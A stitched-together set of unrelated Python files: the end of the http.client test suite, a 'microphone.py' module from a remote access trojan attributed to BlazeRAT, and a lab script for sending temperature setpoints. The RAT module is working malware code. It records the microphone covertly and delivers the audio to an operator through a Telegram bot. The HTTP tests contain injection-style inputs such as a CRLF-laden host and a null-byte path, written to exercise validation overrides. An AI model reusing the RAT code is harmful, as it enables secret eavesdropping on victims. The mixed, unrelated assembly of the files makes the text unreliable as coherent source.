resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
serv = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.addCleanup(serv.close)
serv.bind((HOST, 0))
serv.listen()
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
self.addCleanup(thread.join, float(1))
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
def test_putrequest_override_domain_validation(self):
"""
It should be possible to override the default validation
behavior in putrequest (bpo-38216).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_path(self, url):
pass
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/\x00')
def test_putrequest_override_host_validation(self):
class UnsafeHTTPConnection(client.HTTPConnection):
def _validate_host(self, url):
pass
conn = UnsafeHTTPConnection('example.com\r\n')
conn.sock = FakeSocket('')
# set skip_host so a ValueError is not raised upon adding the
# invalid URL as the value of the "Host:" header
conn.putrequest('GET', '/', skip_host=1)
def test_putrequest_override_encoding(self):
"""
It should be possible to override the default encoding
to transmit bytes in another encoding even if invalid
(bpo-36274).
"""
class UnsafeHTTPConnection(client.HTTPConnection):
def _encode_request(self, str_url):
return str_url.encode('utf-8')
conn = UnsafeHTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/☃')
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
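    # Example usage (simplified from ExtendedReadTest.test_read1 above): wrap a
    # bounded read function so that readline() can be exercised on top of read1():
    #   readliner = Readliner(lambda: resp.read1(4))
    #   line = readliner.readline(5)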
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'MISDIRECTED_REQUEST',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with support.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
selfsigned_pythontestdotnet = 'self-signed.pythontest.net'
with support.transient_internet(selfsigned_pythontestdotnet):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(context.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(context.check_hostname, True)
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
try:
h = client.HTTPSConnection(selfsigned_pythontestdotnet, 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
except ssl.SSLError as ssl_err:
ssl_err_str = str(ssl_err)
# In the error message of [SSL: CERTIFICATE_VERIFY_FAILED] on
# modern Linux distros (Debian Buster, etc) default OpenSSL
# configurations it'll fail saying "key too weak" until we
# address https://bugs.python.org/issue36816 to use a proper
# key size on self-signed.pythontest.net.
if re.search(r'(?i)key.too.weak', ssl_err_str):
raise unittest.SkipTest(
f'Got {ssl_err_str} trying to connect '
f'to {selfsigned_pythontestdotnet}. '
'See https://bugs.python.org/issue36816.')
raise
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
with support.check_warnings(('', DeprecationWarning)):
h = client.HTTPSConnection('localhost', server.port,
context=context, check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_tls13_pha(self):
import ssl
if not ssl.HAS_TLSv1_3:
self.skipTest('TLS 1.3 support required')
# just check status of PHA flag
h = client.HTTPSConnection('localhost', 443)
self.assertTrue(h._context.post_handshake_auth)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertFalse(context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context)
self.assertIs(h._context, context)
self.assertFalse(h._context.post_handshake_auth)
h = client.HTTPSConnection('localhost', 443, context=context,
cert_file=CERT_localhost)
self.assertTrue(h._context.post_handshake_auth)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to send chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
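        # Returns a replacement for socket.create_connection that hands back a
        # FakeSocket preloaded with response_text and recording the (host, port)
        # it was "connected" to, so the tests in this class can inspect
        # conn.sock.host and conn.sock.port.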
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
microphone.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Import modules
from io import BytesIO
from core.logger import Log
from threading import Thread
from wave import open as wave_open # standard library module (no pip install needed)
from pyaudio import paInt16, PyAudio # pip3 install pyaudio
from core.messages import services as Messages
"""
Author : LimerBoy
github.com/LimerBoy/BlazeRAT
Notes :
The file is needed
to record audio from a microphone
"""
# Settings
FORMAT = paInt16
CHUNK = 1024
CHANNELS = 2
RATE = 44100
# Global variables
global r, p, t, stream, frames
r, p, t, stream, frames = False, None, None, None, []
""" Record voice from microphone """
def _RecordMicrophone():
# Initialize
global r, p, stream, frames
frames = []
r = True
p = PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
# Record microphone
while r:
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
""" Asynchronously record voice from microphone """
def _StartAsync():
global r, t
if r: return False
try:
t = Thread(target=_RecordMicrophone)
t.start()
except Exception as error:
print(error)
r = False
else:
return True
""" Stop recording """
def _Stop() -> bytes:
global r, p, t, stream, frames
if not r: return False
r = False
t.join()
# Write to memory
obj = BytesIO()
wf = wave_open(obj, "wb")
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
return obj.getvalue()
""" Handle telegram command """
def Handle(callback: dict, bot) -> None:
text = callback.data
chatid = callback.from_user.id
# Start microphone recording
if "Enable" in text:
# Start voice recording
voice = _StartAsync()
if voice != False:
Log(f"Microphone >> Start voice recording", chatid)
bot.send_message(chatid, Messages.microphone_recording_started)
bot.send_chat_action(chatid, "record_audio")
# Send error message if recording already started
else:
bot.send_message(chatid, Messages.microphone_recording_not_stopped)
# Stop microphone recording
elif "Disable" in text:
# Send recorded voice message
voice = _Stop()
if voice != False:
Log(f"Microphone >> Stop voice recording", chatid)
bot.send_chat_action(chatid, "upload_audio")
bot.send_voice(
chat_id=chatid, voice=voice,
reply_to_message_id=callback.message.message_id,
caption=Messages.microphone_recording_stopped
)
# Send error message if recording not started
else:
bot.send_message(chatid, Messages.microphone_recording_not_started)
|
Main_Tweak_Test-copy.py
|
import Call_UTI
from send_multiple_setpoints import *
from read_Temp_value import *
import numpy as np
import pandas as pd
import os
import sys
from threading import Thread
from ctypes import *
import time
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph as pg
import math
from thermocouples_reference import thermocouples
import itertools
import pickle  # used below to load the interpolation lookup tables
# from initial_UTI import *
"""
1. start reading the masses cycle through 1-2 times (check)
2. take the average time to cycle = total time to write setpoints (check)
3. start the 'official' program
4. read temperature, and masses and write while reading the masses
a. assume that the time to read the temperature = 0
do read mass 2 times:
get the cycle time
for asdfa:
do read mass and write sp(cycle time) use threads
thread1.join()
thread2.join()
do read value
"""
########################################################################################################################
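# Minimal sketch of the loop structure described in the docstring above: read the
# masses in a worker thread while this thread paces the setpoint writes, then join.
# Illustrative only -- it is not called anywhere in this script and assumes the
# thread_read_masses() function and controlObj instance defined further below.
def _sketch_read_and_ramp(masses, sensitivities, signals, setpoints, send_freq):
    reader = Thread(target=thread_read_masses, args=(masses, sensitivities, signals))
    reader.start()
    i = 0
    while reader.is_alive() and i < len(setpoints):
        controlObj.write_sp(setpoints[i])  # one setpoint every send_freq seconds
        time.sleep(send_freq)
        i += 1
    reader.join()
    return i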
def thread_send_mV_setpoint(iter_freq_, mv_setpoints_, sendFreq, alpha, child_thread):
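    """Pace mV setpoint writes while the mass-reading thread is alive.

    Sleeps alpha*sendFreq between writes, steps through mv_setpoints_ starting at
    iter_freq_, falls back to the first setpoint (with serial-port reopen retries)
    on communication errors, and returns the updated setpoint index.
    """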
# alpha_iter = 0
    while child_thread.is_alive():
# start_alpha = time.time()
# currentTime = time.time()
# Write new setpoint for temperature
# adjust send freq
time.sleep(alpha*sendFreq)
try:
if iter_freq_ < len(mv_setpoints_):
controlObj.write_sp(mv_setpoints_[iter_freq_])
# TODO might insert the sleep here
iter_freq_ += 1
else:
controlObj.write_sp(mv_setpoints_[0])
except (IndexError, OSError) as e:
print(e)
# probably wrote past the last mv setpoint, so just go back to first setpoint....
# this is also a safety in case theres a brief communication error
try:
time.sleep(0.01)
controlObj.close_me()
controlObj.open_me()
if iter_freq_ < len(mv_setpoints_):
controlObj.write_sp(mv_setpoints_[iter_freq_])
iter_freq_ += 1
else:
controlObj.write_sp(mv_setpoints_[0])
except (ValueError, OSError) as e:
print(e)
